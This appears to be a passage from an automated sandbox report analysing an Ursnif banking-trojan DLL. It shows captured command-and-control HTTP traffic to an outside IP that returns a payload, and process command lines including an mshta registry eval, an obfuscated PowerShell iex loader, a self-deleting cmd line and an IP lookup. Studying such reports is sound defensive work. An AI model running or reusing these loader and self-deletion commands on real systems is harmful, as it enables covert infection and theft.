32 4f 69 ab 18 b4 9e 99 1f f5 05 56 47 02 8e 9f 27 d4 ff 10 20 e7 ed cd b1 4b 87 6e 27 42 1e 3e 24 80 4a 04 3c a3 49 30 16 f6 80 ec ff 7f 69 7e 67 e9 15 f7 0c 8d 63 a1 52 09 e9 b1 0e 05 e9 aa 92 c3 6e a8 af a5 9b c3 81 03 f7 56 3b 62 cc 61 4a 47 01 5f 44 7c dd 73 98 b0 56 89 42 12 05 2f fd 1e 39 b9 f3 98 27 a9 28 d5 bc c4 8e a4 e7 ec ab 89 c4 ce 19 ea b9 9c 21 dc 88 24 ec 64 2b cb a0 eb bf ca ae d2 49 96 b6 8a 04 ab fa 95 77 fa 63 0a 7a 0d 95 a1 96 99 44 58 4c cf 57 ae a4 39 c8 34 1e 91 57 0a 36 63 09 ab 63 76 c2 c1 18 dd ac c2 70 bf 06 25 e6 27 5d fc f2 4f 2b 48 d4 2b 9b aa 75 25 b7 70 f5 86 3b 83 06 05 3f 10 6e 86 51 69 da a6 a8 0d 8f 67 9f 77 dd f3 f1 bc a3 2b 9b cc 07 3c cd d5 4d 2e 5b 8d 0a 6e f3 42 ee 85 31 81 12 49 42 23 da f6 e0 21 58 34 f1 98 44 20 e0 34 20 6c e2 a7 e9 96 39 bf 64 eb 96 ab af dd c2 e5 93 2f 77 12 5b 31 b6 d4 8e 98 e1 b0 b9 97 01 7b 07 2a 86 59 bd e8 00 a8 a3 36 12 48 2c f4 25 13 19 ba df bb ee 61 56 99 a8 ad 21 38 93 bd 47 26 58 af f0 db 46 7b b6 65 aa de cd dc 57 71 ed 57 29 3c a1 90 6f b4 ca a6 dc 2b a1 45 2a 15 3d 27 0d 14 ac e3 a7 f3 ce f4 a4 99 60 7c d7 95 79 41 ca 61 9a 6f 54 40 1a 4e 73 8d c8 57 85 c6 32 d8 e6 76 bd 9e 2b c8 77 57 64 55 68 1e e8 b8 ce e3 27 ea 88 e0 6b 84 d6 22 a8 40 53 1f fe fd 7f 2c 64 e5 e3 c0 ba b0 7c 8c 1f 0a 1f 3d a3 aa df 4c 84 66 69 de c4 52 16 4a cb 9d 1b 22 74 04 be b4 75 aa ac 10 43 9c 84 24 1d 8b bb 5b c6 a9 da 99 7a c4 10 3c d8 88 4e 6f 5d 84 05 33 69 2b e5 f6 16 bf 76 b7 e2 b7 61 1a 36 95 4b 28 79 75 83 0d af 82 36 39 fb e4 c0 3c c2 32 b4 cc c4 35 09 29 45 a8 bf a7 f5 c5 b1 91 71 b2 a5 a9 77 0d 1f 79 f3 f3 6c a3 ab 52 a9 26 9e df 64 d9 64 a6 4f 74 f8 7f be 12 b6 01 54 bd bc e1 a6 7e 85 e2 01 e7 11 f6 40 6c 49 4a e2 ec 18 e1 9b c7 7e 26 d7 09 41 4c b1 bd cb b6 91 c6 24 7f 1a 3d 1b 36 89 c0 c2 20 6c 33 01 13 79 75 f9 66 8c 40 13 41 38 66 3a 0f 9b 37 54 93 3b 5b 14 19 90 ea 68 99 54 78 3a f9 f4 73 f6
                              Data Ascii: ;Lk%p-z7d11_mE4*r3)]l3Y}Y,DH\MN(DSG%VH&[y??{#M4nRQN'I30RvYIEu|gC3XZ+128kVr B!{k)/coC33V40yjp.[/_B7#^Cj96,O4sR;2\kz'X1Cg.dj_@'!zY$h,5jQ0h<B\hnd2OiVG' Kn'B>$J<I0i~gcRnV;baJG_D|sVB/9'(!$d+IwczDXLW94W6ccvp%']O+H+u%p;?nQigw+<M.[nB1IB#!X4D 4 l9d/w[1{*Y6H,%aV!8G&XF{eWqW)<o+E*='`|yAaoT@NsW2v+wWdUh'k"@S,d|=LfiRJ"tuC$[z<No]3i+va6K(yu69<25)EqwylR&ddOtT~@lIJ~&AL$=6 l3yuf@A8f:7T;[hTx:s
                              May 4, 2022 16:27:54.122081995 CEST1665OUTGET /drew/DI9hOfnq4sis3AGOPt/_2FSN_2BC/vQMmpDQPqFMgJd7cY2BM/bpPiaoMoE2NRqo_2F46/T_2F2moLttcApM2j8JSDhs/WTmAL93U1NjUV/LMXna7GA/0XrWXSOJuSDBIpGqh8yB0Uw/8wBvAy1ROY/CU6_2BgS3mg1oC_2F/fr7BBq_2FOIM/8zgmlDNHCEg/MQH_2B5kPaL7jc/fyWcKgX2hWtfe66c_2BLA/pYfH_2BKPQZE6m8n/dgy8gM_2BVyJKF1/06D2L7PXyZQ5x_2F0m/7pDuXDGuxyU/cHq.jlk HTTP/1.1
                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                              Host: 185.189.151.28
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              May 4, 2022 16:27:54.411616087 CEST1667INHTTP/1.1 200 OK
                              Server: nginx/1.18.0 (Ubuntu)
                              Date: Wed, 04 May 2022 14:27:54 GMT
                              Content-Type: application/octet-stream
                              Content-Length: 1856
                              Connection: keep-alive
                              Pragma: public
                              Accept-Ranges: bytes
                              Expires: 0
                              Cache-Control: must-revalidate, post-check=0, pre-check=0
                              Content-Disposition: inline; filename="62728d6a5f4fa.bin"
                              Data Raw: 9b a0 46 9f fb 74 7e 4c 02 9a 3e fd d9 71 c7 75 b7 c0 cf a4 f1 8f 69 7b ca 68 40 93 06 4e b2 61 6c 45 b6 60 ec c8 ae 61 ba a7 30 65 32 00 93 c4 61 b5 26 75 0f 9c 24 d6 6b 8d 49 83 bd 29 e5 c2 8e 84 e2 03 a7 53 8f 50 53 4e 60 d2 b0 83 79 b0 30 aa 56 2b de 37 b8 1e 29 a1 fe 12 f0 a4 8a b6 1c 50 54 8d e2 11 22 11 00 28 bf 5a 8e 88 5c f1 a5 ea 66 e4 d9 1d 25 32 3c 0d b9 88 74 8f 8e 4d dd 6f 8d 0c ff 3b fb ab 12 a8 aa 7b 3c 4a 84 d1 1c 81 c0 03 d3 5a f7 ca 0e 84 a2 cd bf 4b 4b 8a 9a a7 0b 3b 18 09 93 80 bd 2c 22 aa 10 18 d9 46 7f 3f 4a 98 a1 32 15 53 4d 52 37 e7 3d fc df 0b 99 86 dc 6e 28 45 31 41 af 5b f3 54 b8 c3 c4 0e de b4 8c 35 e7 ae 58 26 d9 51 48 2a a9 7c 38 bf 34 02 be a4 a2 60 c2 f2 a1 0b a5 b7 b8 45 00 65 8d 87 9e 0f 13 57 99 55 9c 6f 29 be 48 cb 2b 94 3e 15 dc a9 ca 66 19 e4 4b 96 5f 82 fb 25 15 6c e8 81 ba c7 c6 11 8f a6 22 f3 d3 46 8e 0a 4e a3 47 a3 43 c4 28 a9 04 8e 33 96 50 fc ff da 85 d8 1a 90 b6 c3 b6 70 00 35 37 e8 e0 9b 16 3a 8f 42 cc df f8 46 d9 65 92 fb a4 09 89 80 4b ed 32 53 0c fb 12 10 01 3c a7 65 18 1f 85 a3 3d 19 3b 35 60 ca 34 5d 34 52 31 52 97 a4 f7 e9 c8 a8 6d fd aa 00 d9 1a 03 b4 cf d3 6b 1d c9 a9 fb 98 be 9e ee 6e 98 aa dc 13 43 f5 f1 a4 c8 15 60 ac 89 bc 66 0e c3 5c 86 cf 87 08 78 b0 d7 93 ca a5 f3 d7 df 9f 82 0e 0c 47 f8 ba bb 22 96 1d 41 af ad 20 bb 3b f4 7c 43 d6 33 6b c5 a7 00 ad c7 e3 85 36 3d a9 cd ff 43 13 5d 1a 98 65 a5 39 a0 04 97 16 f2 aa 48 11 c3 92 11 ad e2 6c a1 be f1 26 93 a6 ac 32 e7 cb 42 6c f0 44 33 e2 1d 8e ae 3e b7 6c 0e 9d d6 61 ea 8a 3d 3b f9 10 d5 5e 6f e6 95 69 c6 71 9b d9 76 5a d7 a6 6d 73 3c 9c 16 98 fe 91 6c 22 21 a9 0d a3 b8 32 ec 0c e2 56 21 bd 0f b2 d9 7d 28 84 dc 5c 0a d0 73 cb ab bd 78 b6 e9 06 c7 a0 94 a6 59 4e d2 71 5b 21 08 5b 65 ac e4 58 76 1e 02 c8 9f 0d dd e0 90 25 a2 63 d5 df 0d 62 e9 e1 79 ab 4a 3b 73 dc 24 a2 34 4b 8e f7 84 e2 34 b7 48 aa f8 38 8e 40 82 ea 3e f7 65 c4 e9 55 1e 1c 09 eb 5f e8 d6 e0 be 03 c7 53 d9 7b 75 89 9d 91 ca e8 cf 8b fc 0e a2 1d 8b 29 79 32 6b ce 7d 50 cd 11 62 8e 9f e2 49 17 42 32 80 05 48 f4 b4 02 6d 95 48 d1 8f cf 58 79 80 88 10 83 25 2d 9c d3 a5 62 18 d5 cb e7 f6 ab c9 05 71 9d 97 91 57 12 95 83 e4 1e 21 ce 98 59 64 61 16 0c bc 86 44 3f 1e 63 85 6a b9 bb dc da c8 93 85 f0 15 ac 87 e7 0f bb 30 62 68 64 d9 35 20 8f a7 46 82 e0 bf e8 92 a0 37 1b 44 4e 09 c2 70 7b 5d ca 65 06 92 d7 1f 02 40 68 d8 f9 ce fe 22 b9 52 d6 37 3d 79 f5 4c bd 14 0c 30 6c e6 2b 48 c0 26 30 b8 43 9d de c8 55 66 eb 9d 88 ce 14 7f 49 50 c5 3f 64 97 0f 7a 4f 48 80 11 af 12 1c 95 66 bf ed ec e1 bd 12 35 7c da 51 24 8f b3 9f f8 1f 9b c0 d9 50 46 63 0f d2 4e 5c 43 00 32 a9 65 5a c3 30 73 8d 98 fa ff 3a 7d c3 b4 d5 ea d1 45 9c 4b 6c 69 1c f6 b4 3a 55 5c 5c 0e de 2a c7 47 93 6d ec 2b 02 99 c6 7b 5d ce 41 e3 ee c9 91 46 6e d4 10 d2 83 3e f6 91 b5 c3 ce d1 b9 12 29 94 e4 5a 7d ac dd 03 fc 4e 8f 4c 65 3e b6 12 c0 2b 6d 73 2a f6 b1 df bd a5 1d 5a 13 b6 7f a5 ca e1 33 ca 6b a4 88 3e c4 2e dd b1 9f 2c 6b 18 5e de cf fe 3b 59 3c 35 5f cf 58 4b 80 b6 2b aa 8f fe 2c ed d8 3b 2e 42 bb af 6f c1
                              Data Ascii: Ft~L>qui{h@NalE`a0e2a&u$kI)SPSN`y0V+7)PT"(Z\f%2<tMo;{<JZKK;,"F?J2SMR7=n(E1A[T5X&QH*|84`EeWUo)H+>fK_%l"FNGC(3Pp57:BFeK2S<e=;5`4]4R1RmknC`f\xG"A ;|C3k6=C]e9Hl&2BlD3>la=;^oiqvZms<l"!2V!}(\sxYNq[![eXv%cbyJ;s$4K4H8@>eU_S{u)y2k}PbIB2HmHXy%-bqW!YdaD?cj0bhd5 F7DNp{]e@h"R7=yL0l+H&0CUfIP?dzOHf5|Q$PFcN\C2eZ0s:}EKli:U\\*Gm+{]AFn>)Z}NLe>+ms*Z3k>.,k^;Y<5_XK+,;.Bo


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:16:27:10
                              Start date:04/05/2022
                              Path:C:\Windows\System32\loaddll32.exe
                              Wow64 process (32bit):true
                              Commandline:loaddll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll"
                              Imagebase:0xe90000
                              File size:116736 bytes
                              MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Target ID:1
                              Start time:16:27:10
                              Start date:04/05/2022
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1
                              Imagebase:0x1190000
                              File size:232960 bytes
                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Target ID:2
                              Start time:16:27:11
                              Start date:04/05/2022
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1
                              Imagebase:0x10e0000
                              File size:61952 bytes
                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.297325888.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.464317231.000000000526F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.297834584.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.343634422.0000000005569000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.297429352.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.461814934.0000000005049000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.297681439.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.343681335.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.297590765.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.344393693.00000000053EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.343553499.00000000054EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.297638770.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.297792500.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.342664941.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.297847872.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:high

                              General

                              Target ID:17
                              Start time:16:27:58
                              Start date:04/05/2022
                              Path:C:\Windows\System32\mshta.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Jqlc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Jqlc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                              Imagebase:0x7ff63b5a0000
                              File size:14848 bytes
                              MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Target ID:18
                              Start time:16:28:00
                              Start date:04/05/2022
                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name axgpbo -value gp; new-alias -name slctai -value iex; slctai ([System.Text.Encoding]::ASCII.GetString((axgpbo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                              Imagebase:0x7ff6ba650000
                              File size:447488 bytes
                              MD5 hash:95000560239032BC68B4C2FDFCDEF913
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Yara matches:
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:high

                              General

                              Target ID:19
                              Start time:16:28:01
                              Start date:04/05/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff647620000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Target ID:21
                              Start time:16:28:12
                              Start date:04/05/2022
                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.cmdline
                              Imagebase:0x7ff71b4c0000
                              File size:2739304 bytes
                              MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET
                              Reputation:moderate

                              General

                              Target ID:22
                              Start time:16:28:14
                              Start date:04/05/2022
                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5F15.tmp" "c:\Users\user\AppData\Local\Temp\m5pod5s5\CSCDE04DA8616441A6AC3074D39CFFC1D3.TMP"
                              Imagebase:0x7ff66f440000
                              File size:47280 bytes
                              MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate

                              General

                              Target ID:24
                              Start time:16:28:17
                              Start date:04/05/2022
                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.cmdline
                              Imagebase:0x7ff71b4c0000
                              File size:2739304 bytes
                              MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:.Net C# or VB.NET

                              General

                              Target ID:25
                              Start time:16:28:18
                              Start date:04/05/2022
                              Path:C:\Windows\System32\control.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\control.exe -h
                              Imagebase:0x7ff62ce00000
                              File size:117760 bytes
                              MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000019.00000000.414668534.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000019.00000000.413947295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000019.00000000.415531783.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security

                              General

                              Target ID:26
                              Start time:16:28:19
                              Start date:04/05/2022
                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73F5.tmp" "c:\Users\user\AppData\Local\Temp\a1gxko15\CSCE08F5B5052974B07835021DDCFF1297.TMP"
                              Imagebase:0x7ff66f440000
                              File size:47280 bytes
                              MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              General

                              Target ID:29
                              Start time:16:28:30
                              Start date:04/05/2022
                              Path:C:\Windows\explorer.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\Explorer.EXE
                              Imagebase:0x7ff6f3b00000
                              File size:3933184 bytes
                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              General

                              Target ID:33
                              Start time:16:28:47
                              Start date:04/05/2022
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\xaj0e933Uv.dll
                              Imagebase:0x7ff7bb450000
                              File size:273920 bytes
                              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              General

                              Target ID:34
                              Start time:16:28:48
                              Start date:04/05/2022
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff647620000
                              File size:625664 bytes
                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              General

                              Target ID:36
                              Start time:16:28:48
                              Start date:04/05/2022
                              Path:C:\Windows\System32\PING.EXE
                              Wow64 process (32bit):false
                              Commandline:ping localhost -n 5
                              Imagebase:0x7ff726940000
                              File size:21504 bytes
                              MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              General

                              Target ID:37
                              Start time:16:28:56
                              Start date:04/05/2022
                              Path:C:\Windows\System32\RuntimeBroker.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                              Imagebase:0x7ff6b45b0000
                              File size:99272 bytes
                              MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              General

                              Target ID:39
                              Start time:16:29:47
                              Start date:04/05/2022
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):
                              Commandline:cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\ADE6.bi1"
                              Imagebase:
                              File size:273920 bytes
                              MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language

                              Disassembly

                              Reset < >

                                Executed Functions

                                Function 034800DC Relevance: 37.8, APIs: 25, Instructions: 331memorylibrarynativeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 43 34800dc-3480125 RtlInitializeCriticalSection call 3479394 46 348014d-348014f 43->46 47 3480127-348014b memset RtlInitializeCriticalSection 43->47 48 3480150-3480156 46->48 47->48 49 3480558-3480562 48->49 50 348015c-3480180 CreateMutexA GetLastError 48->50 51 348019d-348019f 50->51 52 3480182-3480187 50->52 55 3480553 51->55 56 34801a5-34801b0 call 3485261 51->56 53 3480189-3480196 CloseHandle 52->53 54 348019b 52->54 53->55 54->51 57 3480557 55->57 56->57 60 34801b6-34801c1 call 3488452 56->60 57->49 60->57 63 34801c7-34801d9 GetUserNameA 60->63 64 34801db-34801f3 RtlAllocateHeap 63->64 65 34801fd-348020d 63->65 64->65 66 34801f5-34801fb GetUserNameA 64->66 67 348020f-3480214 65->67 68 3480216-3480233 NtQueryInformationProcess 65->68 66->65 67->68 69 348025d-3480267 67->69 70 3480239-3480248 OpenProcess 68->70 71 3480235 68->71 72 3480269-3480285 GetShellWindow GetWindowThreadProcessId 69->72 73 34802a4-34802a8 69->73 74 348024a-348024f GetLastError 70->74 75 3480256-3480257 CloseHandle 70->75 71->70 76 3480297-348029e 72->76 77 3480287-348028d 72->77 78 34802aa-34802ba memcpy 73->78 79 34802bd-34802d4 call 347f01f 73->79 74->69 80 3480251 74->80 75->69 76->73 82 34802a0 76->82 77->76 81 348028f-3480295 77->81 78->79 88 34802e1-34802e7 79->88 89 34802d6-34802da 79->89 84 34802ed-3480329 call 3489370 call 3486c1e call 349087a 80->84 81->73 82->73 96 348032b-348033a CreateEventA call 348e803 84->96 97 348033f-348034e call 347e1b1 84->97 88->57 88->84 89->88 91 34802dc call 34918c0 89->91 91->88 96->97 97->57 101 3480354-3480367 RtlAllocateHeap 97->101 101->57 102 348036d-348038d OpenEventA 101->102 103 34803af-34803b1 102->103 104 348038f-348039e CreateEventA 102->104 106 34803b2-34803d9 call 34873aa 103->106 105 34803a0-34803aa GetLastError 104->105 104->106 105->57 109 34803df-34803ed 106->109 110 3480546-348054d 106->110 111 348049f-34804a5 109->111 112 34803f3-348040b call 348b6d6 109->112 110->57 113 34804b1-34804b8 111->113 114 34804a7-34804ac call 349157a call 347708f 111->114 112->57 128 3480411-3480418 112->128 113->55 117 34804be-34804c3 113->117 114->113 120 348051f-3480544 call 34873aa 117->120 121 34804c5-34804cb 117->121 120->110 131 348054f-3480550 120->131 125 34804da-34804f0 RtlAllocateHeap 121->125 126 34804cd-34804d4 SetEvent 121->126 129 348051c-348051e 125->129 130 34804f2-3480519 wsprintfA 125->130 126->125 132 348041a-3480426 128->132 133 348042c-3480440 LoadLibraryA 128->133 129->120 130->129 131->55 132->133 134 348046f-3480482 call 34881f1 133->134 135 3480442-348046a call 348e778 133->135 134->57 139 3480488-3480491 134->139 135->134 139->113 140 3480493-348049d call 34788fa 139->140 140->113
                                APIs
                                • RtlInitializeCriticalSection.NTDLL(0349A428), ref: 034800FA
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • memset.NTDLL ref: 0348012B
                                • RtlInitializeCriticalSection.NTDLL(0616C2D0), ref: 0348013C
                                  • Part of subcall function 03485261: RtlInitializeCriticalSection.NTDLL(0349A400), ref: 03485285
                                  • Part of subcall function 03485261: RtlInitializeCriticalSection.NTDLL(0349A3E0), ref: 0348529B
                                  • Part of subcall function 03485261: GetVersion.KERNEL32(?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 034852AC
                                  • Part of subcall function 03485261: GetModuleHandleA.KERNEL32(00001683,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 034852E0
                                  • Part of subcall function 03488452: RtlAllocateHeap.NTDLL(00000000,-00000003,773D9EB0), ref: 0348846C
                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000060,?,?,?,?,?,?,?,03479100,?), ref: 03480165
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 03480176
                                • CloseHandle.KERNEL32(000005CC,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 0348018A
                                • GetUserNameA.ADVAPI32(00000000,?), ref: 034801D3
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 034801E6
                                • GetUserNameA.ADVAPI32(00000000,?), ref: 034801FB
                                • NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 0348022B
                                • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 03480240
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 0348024A
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 03480257
                                • GetShellWindow.USER32 ref: 03480272
                                • GetWindowThreadProcessId.USER32(00000000), ref: 03480279
                                • memcpy.NTDLL(0349A2F4,?,00000018,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 034802B5
                                • CreateEventA.KERNEL32(0349A1E8,00000001,00000000,00000000,?,00000001,?,?,?,?,?,?,?,03479100,?), ref: 03480333
                                • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 0348035D
                                • OpenEventA.KERNEL32(00100000,00000000,0616B9C8,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 03480385
                                • CreateEventA.KERNEL32(0349A1E8,00000001,00000000,0616B9C8,?,?,?,?,?,?,?,03479100,?), ref: 0348039A
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 034803A0
